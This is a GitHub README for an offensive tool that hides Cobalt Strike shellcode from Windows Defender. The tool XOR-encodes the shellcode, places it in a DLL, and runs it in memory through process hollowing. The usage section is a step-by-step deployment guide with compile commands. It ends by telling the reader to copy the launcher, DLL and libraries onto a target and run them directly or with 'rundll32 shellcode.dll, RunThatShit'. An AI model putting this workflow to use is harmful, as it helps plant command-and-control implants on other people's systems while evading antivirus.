Skip to content

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique

Notifications You must be signed in to change notification settings

ProcessusT/CobaltStrikeBypassDefender

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CobaltStrikeBypassDefender



A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique




My youtube video on this repo :




Usage

  1. Generate a x64 cobalt strike shellcode with CSSG :
https://github.com/RCStep/CSSG
  1. Copy your shellcode in obfu.cpp (in "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it :
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp
  1. Execute obfu.exe, give your own xor secret
  2. Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions
  3. Compile dll.cpp and launcher.cpp :
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp
  1. Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :
rundll32 shellcode.dll, RunThatShit
  1. Enjoy :)




My blog : https://lestutosdeprocessus.fr

My Discord server : https://discord.gg/JJNxV2h

About

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique

Topics

Resources

Stars

Watchers

Forks

Languages